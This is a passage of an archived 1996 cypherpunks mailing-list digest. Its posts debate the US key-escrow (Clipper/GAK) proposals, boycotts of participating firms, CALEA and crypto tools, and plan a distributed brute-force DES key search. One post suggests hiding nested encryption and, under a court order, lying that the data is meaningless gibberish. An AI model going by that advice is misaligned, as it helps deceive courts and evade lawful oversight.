      considered as the basis for a new global standard. 
 
      For more on RecoverKey, see:  
      http://www.tis.com/docs/products/cke/index.html 
 
 
   High-Tech Leaders Join Forces to Enable International 
   Strong Encryption 
 
      See: http://www.ibm.com/news/alliance2.htm 
 
   ----- 
 
   http://jya.com/floodd.txt 
 
   ftp://jya.com/pub/incoming/floodd.txt 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Fri, 4 Oct 1996 08:59:05 +0800
To: jimbell@pacifier.com
Subject: Re: REM_ail
In-Reply-To: <199610021627.JAA25110@mail.pacifier.com>
Message-ID: <199610031349.OAA00384@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



Jim Bell <jimbell@pacifier.com> writes:
> Now that Helsingius has shut down Penet, what's to stop him from simply 
> LYING about the source of the messages in question, maybe claiming that they 
> came from the output of a cypherpunks remailer and are thus permanently 
> untraceable?
> 
> (one feature it might have been useful for him to have included in Penet is 
> the ability of the user to re-address a return address, which would 
> presumably erase the original address in the records.  Just sending email 
> and some particular password would do it...)

He did have a feature which allowed you to remove your address.
(Either by sending mail to "remove" or "delete" (with a password if
you had one set)).

Adam
--
#!/bin/perl -sp0777i<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<j]dsj
$/=unpack('H*',$_);$_=`echo 16dio\U$k"SK$/SM$n\EsN0p[lN*1
lK[d2%Sa2/d0$^Ixp"|dc`;s/\W//g;$_=pack('H*',/((..)*)$/)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Fri, 4 Oct 1996 09:30:37 +0800
To: richieb@teleport.com
Subject: boycott GAKkers (was Re: NYT on IBM GAK)
In-Reply-To: <3.0b24.32.19961002181037.0067e434@mail.teleport.com>
Message-ID: <199610031402.PAA00388@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



Rich <richieb@teleport.com> writes:
> >>>
> >>>    The New York Times, October 2, 1996, pp. D1, D8. 
> >>>    Executives of the International Business Machines 
> >>>    Corporation said late yesterday that they were still lining 
> >>>    up the final list of companies in the alliance. Those 
> >>>    involved will include Digital Equipment and smaller 
> >>>    data-security companies including RSA Data Security, Cylink 
> >>>    and Trusted Information Systems. 
> [...]
> 
> The word "boycott" leaped into my mind.  I personally do not believe that I
> will be buying products from any of these companies, as long as thay
> participate in this GAK charade.

It might be worth people in the US who have connections with any of
the companies who have been reported as signing on to GAK asking their
CEOs, etc. for a statement on the company position wrt GAK.  (To make
sure the boycott is justified, and not the result of bad reporting).

If their reports confirm a pro-GAK stance, their company should be
added to the list of shunned.

Perhaps cypherpunks who currently work for the companies in question
could also find out the story.  If they have an option, they could
perhaps leave in protest, stating GAK governmen sell out as the reason
in their resignation letter.

(I've seen HP, Sun, RSADSI, TIS, Apple, Atalla, DEC, Groupe Bull, IBM,
NCR Corp., and UPS mentioned).  Any confirmations?  Denials?

Adam
--
#!/bin/perl -sp0777i<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<j]dsj
$/=unpack('H*',$_);$_=`echo 16dio\U$k"SK$/SM$n\EsN0p[lN*1
lK[d2%Sa2/d0$^Ixp"|dc`;s/\W//g;$_=pack('H*',/((..)*)$/)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 4 Oct 1996 15:41:02 +0800
To: "Timothy C. May" <cypherpunks@toad.com
Subject: Re: The New GAK-Clipper Thing will Fail
Message-ID: <199610032208.PAA15955@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:11 AM 10/3/96 -0800, Timothy C. May wrote:
>
>Comparing the latest GAK/Clipper III (or is it Clipper IV?) thing to the
>original Clipper announcement in April 1993, I sense a lot more confusion,
>a lot more thorny issues, and a lot more vagueness. They just seem more
>disorganized and less committed than the last time around. Each iteration
>of Clipper gets less focussed and seems to last a shorter time before the
>next version is being talked about. A good thing, of course.

Sort of like a "political" version of Zeno's paradox?    B^)

>
>Some random points:

>--the large pool of _existing_ crypto products means people will be using
>these products for years to come (possibly within GAK wrappers, as just
>noted)...unless the New World Order (tm) somehow locates, seizes, or
>otherwise makes criminals out of those who use a once-legal product, how
>could this be stopped?

And I suspect that there will be large numbers of people using non-GAK 
simply as a protest.  Trying to convict even one of them will be difficult; 
the government has to admit that they're not doing anything illegal, etc.  
Yet, if the gov't FAILS to prosecute them, that'll destroy an law requiring 
GAK.

[snip]

>(On the "costs" issue, running these Key Authorities, staffing them,
>complying with subpoenas (and who will _fight_ the subpoenas?),

I think it would be appropriate to contact each of the companies which have 
publicly signed on to this most recent propsal (Clipper 3.XX?  Clipper IV?) 
and point out that (if they still won't revoke their approval) they should 
publicly and irrevocably commit to challenge each and every key subpoena 
with a full legal challenge (to the SC if necessary), INCLUDING informing 
and participation of the key owner/user, with all of his attorney fees paid 
for by an insurance policy issued specifically for the purpose.  This 
process would probably take at least months, if not years.

(This is important, because I believe that wiretaps have set a false 
precedent:  AT+T (before breakup) and local telcos afterwards, being 
monopolies, had no motivation to challenge wiretap orders, and the practice 
was to not inform those tapped, perhaps not even after the tap was removed.  
There is no reason to assume, however, that key-escrow systems should follow 
that precedent, because the relationship between AT+T and government was not 
an "arm's length" one.  Presumably, key-escrow companies should be entitled, 
no REQUIRED to verify the legitimacy of any key-release.  "It's only fair!"  )

The resulting legal atmosphere would become so distasteful to the Dept. of 
Injustice that it would make key escrow useless as a practical tool, even 
though it would exist as a technicality.  If the DOI objected, companies 
need merely say the magic words "Richard Jewell" and all ordinary citizens 
would recognize the problem.

The point, of course, is NOT to encourage these companies to support Clipper 
IV.  Rather, goal is to suggest to them a "poison pill" which would make 
their cooperation meaningless in the end, while at the same time giving them 
a 2-year free 56-bit export.  Think of it as a monkey-wrench they can throw 
into the works.

We can use such a proposal as a sort-of "loyalty to freedom and their fellow 
citizens oath" because any company which refused such a REASONABLE 
protection to ordinary citizens would be, in effect, giving their middle 
finger to the public.





Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin Janzen <janzen@idacom.hp.com>
Date: Fri, 4 Oct 1996 09:39:20 +0800
To: cypherpunks@toad.com
Subject: New location for IBM GAK article
In-Reply-To: <199610031731.KAA26729@mail.pacifier.com>
Message-ID: <9610032208.AA02808@sabel.idacom.hp.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

jim bell writes:

> >   High-Tech Leaders Join Forces to Enable International 
> >   Strong Encryption 
> > 
> >      See: http://www.ibm.com/news/alliance2.htm 

> This is apparently no longer valid.  Is there a new one?

I found it again, at:   http://www.ibm.com/News/ls961002.html

MJ


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMlQw7G3Fsi8cupgZAQFSvwP/b/Q1G/VGuw0PuvlsMp0/pZ8kJAeWze7X
C8GmJ8GPi3fUWcmXD9z01bmbhVNFMq67/w0DhnN3k6agL9NKjmq4lymI+O46aAin
lrKjREvp92j0/Trac9G3ZvAXbYWfEDvSowTECB+CykdR1ZICqT2Y9RZ0bXDr73US
O78IesGegxM=
=qNuH
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Fri, 4 Oct 1996 15:27:55 +0800
To: cypherpunks@toad.com
Subject: "Macintosh -- the Surveillance System for the Rest of Us
In-Reply-To: <v03007801ae79afc6404c@[207.167.93.63]>
Message-ID: <v03007801ae79f80a6c10@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:17 PM -0700 10/3/96, Lucky Green wrote:
>On Thu, 3 Oct 1996, Timothy C. May wrote:
>> I think we should support Microsoft and Netscape in their nonparticipation
>> in the Cabal. Sometimes being an 800-pound gorilla has its advantages.
>
>Indeed we do need to support Netscape and <sigh> Microsoft as long as
>they oppose GAK.
>
>--Lucky, who meant to buy a new PowerBook 5300 for his girlfriend this
>week and who now will get her a Win95 machine because of Apple's support for
>GAK. I'm glad I didn't buy it yet. Apple, are you listening?

GAK, or Girlfriend's Access to Keys, is indeed a very scary thing.

"Macintosh, the Surveillance System for the Rest of Us."

(Why Apple would go along with this, while Microsoft and Netscape are
apparently not playing ball, is incomprehensible to me. Apple risks
alienating its remaining core user base, who often characterize Microsoft
as "the Borg." So, Apple capitulates, while MS does not. I guess the
"Macintosh Crypto Forum" didn't do a lot of good, did it?)

--Tim



"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 4 Oct 1996 07:26:11 +0800
To: John Gilmore <gnu@toad.com>
Subject: Re: How to Compete under Clipper-3
In-Reply-To: <199610031836.LAA22062@toad.com>
Message-ID: <199610031925.PAA11450@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



John Gilmore writes:
> The right competitive strategy is to build strong crypto using 168-bit
> Triple-DES, in a country that has a sane government and a respect for
> privacy.

You mean, like SSH's product?

For those that don't follow this, people who don't want to have their
communications listened in on are free to buy high quality
communications security products from SSH Communications Security, Ltd.
Their stuff is distributed internationally by Datafellows, and
includes 3DES, 128 bit IDEA, and plenty of other high quality crypto
products -- you configure it for the cipher of your choice. Key
management is handled with arbitrary key length RSA -- you, the user,
tune the length of the key, not the NSA.

The software is available free for noncommercial use and can be
downloaded on the net. Commercial users must pay a license fee.

This is only one such company. Most such companies are doing fine, and
aren't playing along with stupidity propagaged inside the beltway.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Fri, 4 Oct 1996 04:38:19 +0800
To: cypherpunks@toad.com
Subject: Re: FUCK!!!!!!;-) The Book
Message-ID: <199610031531.PAA04824@pipe2.ny1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   A new book, "Digital Soldiers," by James F. Dunnigan, 
   emphasizes that information warfare -- deceiving the 
   enemy -- is as old as war, and that the PR-driven media 
   today work closely with the warfighting industry to 
   protect their mutually lucrative markets. 
 
   The latest GAK PR campaign fits this. 
 
   Dunnigan also makes hash of the recent opportunistic 
   "infowar" PR, along with adept grinding of the vast, 
   corrupt high-tech defense industry worldwide, led by the 
   US war-prognosticating PR-media-policy lizards. As he 
   says, bad news is always good news for the Hearsts and 
   Rasputins (Responsible Personages), for the liars of 
   brimstone religion, for all the terrifying doomsayers  
   peddling trust-my-god: me, now tithe or be taxed. 
 
   Dunnigan's sermon: stop the pork, then there will be  
   plenty of resources to deal with the rest of society's 
   ills. Otherwise, peace, real or vitural, is war, 
   sustained barbarity camouflaged by self-interested 
   civility -- the peacefighting, ticket-punching officer,  
   er, journalist, class. 
 
   Digital Soldiers 
   The Evolution of High-Tech Weaponry and Tomorrow's Brave 
   New Battlefield 
 
   James F. Dunnigan 
   St. Martin's Press, New York; $25.95 
   ISBN 0-312-14588-8 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Ubois <jubois@netcom.com>
Date: Fri, 4 Oct 1996 11:25:23 +0800
To: cypherpunks@toad.com
Subject: paging nets
Message-ID: <2.2.32.19961003223312.0071ba70@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Interesting recycled bits from Newsbytes concerning a BBC story drawn from
Usenet: 

BBC Blows Radiopager Security Systems Wide Open
LONDON, ENGLAND, 1996 OCT 2 (NB) -- By Steve Gold. The
British Broadcasting Corporation (BBC) has revealed that radiopaging
messages on the UK's paging networks can be read by anyone with a
radio scanner and suitable PC software. In addition, the British TV
company claims that it is also possible to insert bogus messages onto
the paging networks using instructions on the Internet. 

... BBC journalists, meanwhile, said that UK radiopaging
transmissions were unencrypted and, as such, were insecure when viewed
alongside digital cellular phones, where signals are encrypted.  

...the BBC claimed it had been shown messages
reporting on the activities of Tony Blair, the head of the British
Labor Party, along with a message referring to a residence of a member
of Royalty.

Newsbytes noted that the same system is used in the US. 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@chromatic.com>
Date: Fri, 4 Oct 1996 13:09:45 +0800
To: theworld@pri.org
Subject: Lack of reporting on CALEA and Encryption issues ...
Message-ID: <199610032238.PAA15532@ohio.chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain


I must first say that your program is one of the finest in news
reporting, and I tune in every day.

However, nothing is perfect, and your program is no exception:

I am very concerned by the lack of reporting on CALEA (the US $500
Million Digital Telephony bill) and the continuing maneuvering by the
Clinton administration on the encryption issue.

Two years ago, FBI Director Louis Freeh managed to slip a $500 Million
wire tap bill into the Congressional budget using last-minute sneaks.
(He and his predecessors had tried unsuccessfully for several years to
do it in the full light of open democracy, so this was the only way
they could force it down American's throats.)  After seeing this pass,
many Congress members refused to fund it because the FBI continued to
violate terms of CALEA which required full accounting to Congress of
how the wire tap capacities were to be designed and used.  When the
figures were finally published, the public balked.  Not surprisingly,
Freeh had to resort to the same last-minute maneuvers to sneak in
funding for CALEA this year.

If the news media had reported either incident (or both), I would
probably not be so upset, but the news media completely ignored this
horrible abuse of the democratic process.

The same goes for the encryption issue.  It is clear that all present
and past administrations have sided strongly with law enforcement and
national security agencies, and have refused to allow for the
proliferation of strong encryption despite the fact that it is
probably the single biggest technical obstacle to Internet commerce
and personal privacy.

Again I would not be so upset if they let the issue be decided in the
full light of democracy rather than behind closed doors using the "if
you only knew what we knew, you would agree with us" argument.  This
sentiment is precisely echoed by the Congressional study done by the
NRC on national cryptographic policy.  The Clinton administration was
hoping that the two year study would buy time and would eventually
agree with its opinion, and when it did not, the Clinton
administration dismissed it as uninformed, despite the fact that most
of the NRC panel did get the infamous "secret briefing" by the NSA.

Basically, they are not open to reason on this issue; they are open to
one and only one idea: that law enforcement and national security
agencies having guaranteed access to information when they want it,
and they don't care about the technical or the privacy implications.
Oh .. and by the way, they want access to all information, not just
that which crosses national borders.

The significance of these two issues are difficult to summarize in a
sound bite.  The best I can think of is to watch the Tom Clancy movie
"Clear and Present Danger".  While watching this movie, note how the
CIA finds the telephone conversations of the drug dealer's agent.
That sort of capability is called "drift net fishing" (for obvious
reasons).

"drift net fishing" was not possible in the old days of wire taps
because the phone company barely kept enough written logs to find the
cables and the wires, let alone figure out exactly where they go.  The
problem is especially difficult in older/larger cities where phone
company technicians often tap a wire (for normal services) wherever it
works.  By the FBI's estimates, each physical wire tap costs on the
order of $50K.  Basically, the huge cost barrier (in man power) kept
the government's powers in check.

Enter the digital and wireless age, and suddenly every signal from
every phone, beeper, computer and other neato gadgets are sent all
over the place.  True, it has become more difficult to figure out
where a signal is routed, and that is what the FBI complained about.
On the other hand, it has become infinitely easier to intercept
communications without detection because every transmission is just a
perfect verbatim copy of the original.

Suddenly, the cost of monitoring a phone is not so high.  If the
routing capability is there, the FBI agents can sit in their
comfortable offices and press the right buttons, and the contents of
the call is duplicated at their desks.  Of course, they don't have to
have real people monitoring such calls; they can have voice analysis
computers do it.  They can search for anything that sounds like "bomb"
or "kill" or "shoot" or "blow up".

In the Clancy movie, such "drift net fishing" capability is clearly
being used for good purposes, and I certainly applaud that.  I hope
that all of the leading edge technologies used by our law enforcement
and national security agencies are used for good purposes.

But that is not what history tells us.  History tells us that such
technologies are oblivious to the morals and ethics of their masters.
Even in the older days of wire tapping techniques, the FBI was able to
illegally intercept communications of civil rights leaders and other
"dangerous" elements of society.  Therefore, to grant the government
capabilities that would enable "drift net fishing" on our own citizens
is setting a very dangerous precedence.  What if the FBI decides to
search for "democratic" or "republican" or "pro-choice" or "pro-life"?
What if they search for "muslim" or "jewish" or "christian"?

These are the real dangers of CALEA and encryption restrictions.  The
boogie men that will plan bomb attacks and kidnap children have always
found a way to do it, and some have gotten away, without any help from
encryption or secure telephones.

If the law enforcement and national security agencies truly want to
save lives and promote public safety, there are many other issues and
problems to deal with, and they are wasting valuable time with these
two issues; other the other hand, if they just care about keeping and
enhancing their abilities to be omniscient, then their current
behavior is quite consistent with that goal:

1.  Lies and misrepresentations:

    a.  Louis Freeh now claims that CALEA will cost $2 billion.

    b.  The CALEA slush fund Freeh got passed at the last minute of
        this Congress is actually unlimited.

    c.  Despite their promises of full reporting, they have actually
        succeeded in defeating all the reporting clauses in CALEA,
        again, thanks to this last minute sneak.

    d.  Clinton, Gore and company have consistently denied that they
        intend to restrict domestic encryption.  However, if you
        listen to Gorelick, Freeh, Reno, Crowell and others, you will
        find out that they absolutely against domestic encryption.

2.  Beaurocratic maneuvering:

    a.  Spent 3 years "investigating" Phil Zimmerman and then dropped
        without comment.

    b.  Used every trick in the book to keep ITAR encryption rules
        from ever being directly considered for Constitutionality.
        (NSA internal counsel believes it will not withstand such a
        legal challenge.)

    c.  Refused to clearly define what is exportable and what is not.
        (Keep it confusing so that most will stay away just to be
        safe.)  Also refused to clearly define what is "export",
        given that encryption is just algorithms and information in
        the purest form.

I appeal to you, as a respected news organization, to investigate this
in detail and expose the facts and let the public decide.

Thank you.

Ern




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: watson@tds.com
Date: Fri, 4 Oct 1996 10:58:32 +0800
To: cypherpunks@toad.com
Subject: Re: White House crypto proposal -- too little, too late
Message-ID: <199610032242.PAA15111@mailman.tds.com>
MIME-Version: 1.0
Content-Type: text/plain



Joe Shea, Editor-in-Chief of The American Reporter, said:
>        Declan, how does your list work?  Do you only publish comments
that agree with you?  I didn't see my first two, and this one only came
with your response.  Is this your version of freedom of the press, or what?

-
Maybe Joe would agree to publish everything we send him if we agree to
publish everything he sends us.

Dave
Love to get published




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 4 Oct 1996 11:51:21 +0800
To: Jim McCoy <cypherpunks@toad.com
Subject: Re: Clipper spin [was Re:Flood Warning]
Message-ID: <199610032304.QAA20608@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:00 PM 10/3/96 -0800, Jim McCoy wrote:
>[...]
>>
>>   High-Tech Leaders Join Forces to Enable International
>>   Strong Encryption
>>
>>      See: http://www.ibm.com/news/alliance2.htm
>
>The "International Strong Encryption" phrase is something that we
>need to become active in stopping.  Anything which responds to such
>announcements should put a different spin on this phrase.  If the
>Clipper farce is accepted as "strong" encryption then the battle is
>lost; maybe something like "it is _international_ strong encryption
>because it is the strongest encryption people like Saddam Hussein [insert
>bogeyman du jour] want Americans to have access to"

Idea 1:  It should be called "International Weakened Encryption."

Idea 2:  The "alliance" term above in the URL should be replaced with "Axis."
Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Omegaman" <omega@bigeasy.com>
Date: Fri, 4 Oct 1996 15:38:31 +0800
To: camcc@abraxis.com
Subject: Re: Censorship?
Message-ID: <199610032104.QAA23440@bigeasy.bigeasy.com>
MIME-Version: 1.0
Content-Type: text/plain



> What say ye??
> 
> :From: Zimm2@gnn.com (Zimm2)
> :Newsgroups: alt.security.pgp
> :Subject: Cypherpunks engaged in censorship?
> :Date: Wed, 02 Oct 1996 08:39:50
> :
> :It has come to my attention that Cypherpunks no longer allows users of 
> :Microsoft browsers to access their archives.

The "cypherpunks archives" is not owned by the cypherpunks or 
maintained by toad.com (which is the host of the actual list).  The 
owner of infinity.nus.sg/cypherpunks webpage maintains the archive.  
It is his effort and his choice to restrict the browser.

Anyone is free to provide an archive the list.  And anyone can read 
the list.

> :Is it contradictory for an organization who proclaims an interest in the free 
> :exchange of ideas through the mechanism of the Internet to limit the exchange 
> :of ideas using an individual's software decisions as the criteria?

Agreed.  

But the cypherpunks is not an "organization" in the strictest sense.  
The only "official" aspect of cypherpunks is the list hosted at 
toad.com.

> :Are issues of annonymity and privacy and the encouragement of private use of 
> :powerful encryption and remailer tools secondary to and less important than a 
> :crusade against a software manufacturer?

Of course not.  But the owner of http://infinity.nus.sg/cypherpunks 
disagrees and since it's his website and he pays for it and compiles 
it...

me
--------------------------------------------------------------
 Omegaman <mailto:omega@bigeasy.com>
 PGP Key fingerprint =  6D 31 C3 00 77 8C D1 C2  
                        59 0A 01 E3 AF 81 94 63 
Send a message with the text "get key" in the 
"Subject:" field to get a copy of my public key.
--------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Fri, 4 Oct 1996 08:45:37 +0800
To: cypherpunks@toad.com
Subject: RSA's position on espionage-enabled crypto.
Message-ID: <199610032013.NAA23928@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


RSA has put up a 'position statement' on clipper 4 at their home
page at www.rsa.com. 

They're  not rejecting it, but are clearly not wildly pro-GAK either. It's
clearly early days yet.


Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Fri, 4 Oct 1996 10:39:07 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: The New GAK-Clipper Thing will Fail
In-Reply-To: <v03007804ae79b86b481c@[207.167.93.63]>
Message-ID: <Pine.SUN.3.91.961003161001.21310A-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


side-point:

Somebody mentioned that one of the features in the new go-around is that 
only session keys need to be made available, and warrants will be needed 
for each message to be decrypted.

Doesn't this essentially rule out the use DSS/Diffie Helman based
key-exchanges, or at least diffie-helman with ephemeral paramaters? 

Simon
	DId you know that the Polish Train company is called PKP? 
	Coincidence - you decide.


---
Cause maybe  (maybe)		      | In my mind I'm going to Carolina
you're gonna be the one that saves me | - back in Chapel Hill May 16th.
And after all			      | Email address remains unchanged
You're my firewall -    	      | ........First in Usenet.........




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Smith-Roberts <rsr@lab.net>
Date: Fri, 4 Oct 1996 15:33:39 +0800
To: cypherpunks@toad.com
Subject: Re: How to Compete under Clipper-3
In-Reply-To: <199610031925.PAA11450@jekyll.piermont.com>
Message-ID: <Pine.LNX.3.95.961003161257.20336B-100000@Citadel.Lab.NET>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 3 Oct 1996, Perry E. Metzger wrote:

> For those that don't follow this, people who don't want to have their
> communications listened in on are free to buy high quality
> communications security products from SSH Communications Security, Ltd.
> Their stuff is distributed internationally by Datafellows, and
> includes 3DES, 128 bit IDEA, and plenty of other high quality crypto
> products -- you configure it for the cipher of your choice. Key
> management is handled with arbitrary key length RSA -- you, the user,
> tune the length of the key, not the NSA.
> 
> The software is available free for noncommercial use and can be
> downloaded on the net. Commercial users must pay a license fee.

And if anyone is so inclined, Alan Cox is/was working on taking the last
set of free(*) ssh source (1.2.13) and bugfixing it to keep in step with
the commercial distribution (at least).

You'll still have to pay for the Windows SSH client, though.

* That's GNU free, folkx

-- 
\/\ Lab.NET | Ryan Smith-Roberts - I speak for Lab.NET, so NYAAH!
/\/  we do  |     rsr@lab.net    - http://www.lab.net/~rsr
\/\  stuff  |    JAFuckingP/JH    - finger/www for PGP key

It is by caffeine alone I set my mind in motion, it is by the beans
of Java that thoughts acquire speed, the hands acquire shaking, the
shaking becomes a warning, it is by caffeine alone I set my mind in
motion.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: romana@glamazon.com (Romana Machado)
Date: Fri, 4 Oct 1996 12:52:24 +0800
To: cypherpunks@toad.com
Subject: EzStego in Java!: Now Disappearing At A Site Near You
Message-ID: <v02110107ae79fe27ea50@[206.184.133.208]>
MIME-Version: 1.0
Content-Type: text/plain


EzStego, my tool for "steganography made easy", now has its own web site at
http://www.fqa.com/ezstego/

EzStego is currently alpha software. Use it at your own risk. It is a
reimplementation in Java, with much improvement, of my notorious shareware
product, Stego. EzStego is also shareware. I have made the source code
available for peer review and verification.

EzStego and EzSteggy are (C) Romana Machado 1996. All rights reserved.



Romana Machado romana@fqa.com
http://www.fqa.com/romana/ http://www.glamazon.com/







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Fri, 4 Oct 1996 16:23:50 +0800
To: trei@process.com
Subject: Re: Can we kill single DES? #2
In-Reply-To: <199610021852.LAA28445@toad.com>
Message-ID: <199610031536.QAA00481@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



Peter Trei <trei@process.com> writes:
> One offer was made of a $1000 reward in return for a crack, if the
> offerer could make publicity hay of the offer (no, I don't have a problem
> with that, but I'd like it set up so that others could add to the reward as
> well). If the reward got big enough ($10k?) I think it would be a 
> major incentive for otherwise uninterested people to run the screen
> saver. On the other hand, it might get into legal hassles - I don't know.

Perhaps the companies which have maintained anti-GAK stances could be
persuaded to have a whip-around?

I've seen mentioned as crypto friendlies in list discussion recently:
Netscape, PGP Inc (obviously:-), Silicon Graphics, others?  (The
internet casino people?)

The SSL challenge had a digicash prize fund, and Pete Wenzel won 
c$ 442.30.

With the advent of a real money backed digicash bank, Mark Twain bank,
perhaps someone with an account could set up a page for donors to give
donations via MT digicash.  This would allow anonymous donations.
Perhaps First Virtual payments too.  Someone who can accept credit
card payments for donations would be real handy too.

Anyone still with contacts at MT (Lucky?) would they be interested in
promoting the idea, perhaps donating prize cash.  Also FV could gain
some positive publicity by supporting.

(For fun, you could take the prize money, in the form payable to
anyone, as MT ecash, and encrypt it with DES.  Publish it as the
challenge.  The winner gets the cash:-)

> [...]

You're probably aware of most of the below, as you were involved with
the Netscape SSL break, so this is really just a suggestion that you
might be able to cut some corners on time to implement by borrowing
some stuff.

> I'm really concerned about the problem of a search failing, or 
> succeeding only after too long a time. Perry's proposal of about
> a month of real time is on the right order, though I could see up
> to 3 months being possible.
> 
> Here's what I'm thinking of doing:
> 
> 1. Writing a prose description of the platform independent speedups.
> 
> 2. Writing a proposal for a client-server protocol for doling out
>    keyspace and returning results. Aside from the direct Internet
>    interface, there will also be a mechanism for i/o via plain text -
>    suitable for cut-and-paste, or simple CLI interfaces.

Take a look at SKSP (Simple Key Search Protocol) before you do, this
was what was used for the 31 hr Netscape SSL brute force.

Piete Brooks <pb@cl.cam.ac.uk> has perl implementations for clients
and servers, and should be able to point you at the draft RFC for
SKSP.  www.brute.cl.cam.ac.uk was a DNS he set up for the purpose.
Some of the software is available starting from:

	http://www.cl.cam.ac.uk/brute/

Andy Brown <a.brown@nexor.co.uk> wrote a win95/NT client for the SKSP
protocol, this would be another reason to use the protocol, few
modifications presumably would be required to the NT client to work
for a DES break.

SKSP was written to make it possible to have a multiple tier system,
with key dolers taking out large chunks from the main server, and
doling it out to clients, or further sub-servers.  Multiple servers
could be also managed by multiple IPs for the same DNS name, with
random selection of the IPs, to share out work for the servers.

The protocol was set up to do multiple targets (bruterc4, brutessl,
all that would be needed would be a brutedes which followed the
template of responses, especially for the unix setup).

The protocol also had some (albeit weak) protection against mistakes,
and uninformed malicious attacks -- the acknowledgements are only
counted with a checksum.  (It is fairly trivial to generate the
checksum without doing the work).

As a way of providing slightly more robust reslience to malicious
attacks, I remember that the approach of the server picking a random
key in the range doled out, and computing the decrypt for that key
itself was discussed in relation to the SSL attack.  The key matching
the decrypt would then form the sanity check.

People can still can abuse the system, but they can't help doing some
work, even if they lie about the outcomes, and this slows them down.

Adam
--
#!/bin/perl -sp0777i<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<j]dsj
$/=unpack('H*',$_);$_=`echo 16dio\U$k"SK$/SM$n\EsN0p[lN*1
lK[d2%Sa2/d0$^Ixp"|dc`;s/\W//g;$_=pack('H*',/((..)*)$/)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: scrappo.reverb@juno.com (A L)
Date: Fri, 4 Oct 1996 13:59:27 +0800
To: cypherpunks@toad.com
Subject: Re: How might new GAK be enforced?
In-Reply-To: <9610021732.AA17359@notesgw2.sybase.com>
Message-ID: <19961003.163900.8239.6.scrappo.reverb@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


On 2 Oct 96 10:34:34 EDT Ryan Russell/SYBASE <Ryan.Russell@sybase.com> writes:
>One way to handle the problem mentioned below
>is this:
>
>Using your GAK-approved encryption, send a note
>that contains a PGP encrypted body (or insert your
>crypto of choice here.)  What this does is makes it
>look like you're sending a proper GAK only note
>to folks who are checking headers and such.  If 
>they actually decrypt it (with the proper court order), 
>they will see that you've got more encryption inside, 
>and drag your butt off to court and try to make you 
>give up your key etc...
You could also go one step further and leave out all
references that it was encrypted, (I think this was
discussed in a stego thread.) then when asked (told)
to decrypt it, say:
"Decrypt what? It looks like gibberish to me."

>
>    Ryan
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 4 Oct 1996 17:07:59 +0800
To: cypherpunks@toad.com
Subject: Re: Cypherpunk forgery.
In-Reply-To: <19961003164259.20019.qmail@kiwi.pyrotechnics.com>
Message-ID: <FXP9uD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


scallon@kiwi.pyrotechnics.com writes:

